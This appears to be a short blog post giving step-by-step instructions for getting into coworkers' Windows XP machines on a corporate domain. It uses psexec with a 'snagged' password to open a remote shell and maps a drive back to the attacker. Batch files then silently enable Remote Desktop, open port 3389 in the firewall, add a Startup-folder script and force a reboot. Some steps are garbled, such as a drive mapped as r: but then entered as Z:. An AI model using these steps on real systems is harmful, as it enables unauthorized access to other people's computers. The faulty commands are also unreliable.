In most corporate environments all the XP boxes are on a domain, which means their credentials are just flying around all over. To crack these passwords is difficult because of the kereberos encryption scheme, however most people's personal passwords, to things like myspace, etc, will not be encrypted, and sometimes these passwords are the same as their domain credentials.
Traditionally on machines in a corporate network RDP is enabled but, if it isn’t then you can use psexec to get it set up.
http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Open the cmd prompt by hitting start run, then typing cmd then hitting enter.
Type this into the cmd prompt(make sure you are in the directory that psexec is in when you do this, you could add psexec to the system path, if you got in the habit of using it:
psexec \\machinename –u username cmd
It will prompt you for a password which hopefully you have previously snagged. Username should be the username not the word. The cmd in the command above is saying to execute a cmd prompt, which will appear on your machine as a standard cmd, but it is linked to their machine. To verify you are connected to their machine type hostname and make sure their machine name is shown, not yours. PSEXEC has an option for uploading a file when you use it but, I haven't had the best of look with it. What I do is use the net command to map a drive to your computer from the other computer. I.E. :
Net use r: \\yourmachinename\public /persistant:no
Will map the drive to your computers shared folder named public. So now you can just type.(Remember this is in the remote machines cmd not your own)
Z:
So you can run a silent install of vnc for some sweet gui action or if you know no one is actually in front of the computer you can create these three bat files. And run first.bat.
Make three .bat files in the same directory on a thumb drive:
first.bat
code:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
mkdir c:\batter
copy second.bat c:\batter
copy third.bat c:\batter
cd %USERPROFILE%\Start Menu\programs\Startup\start.bat
copy c:\batter\second.bat start.bat
shutdown -r -t 0
second.bat
code:
netsh firewall set portopening tcp 3389 "RemoteDesktop"
cd c:\batter
third.bat
third.bat
code:
cd %USERPROFILE%\Start Menu\programs\Startup\
del start.bat
This enables remote desktop on that machine and you can now remote in.
No comments:
Post a Comment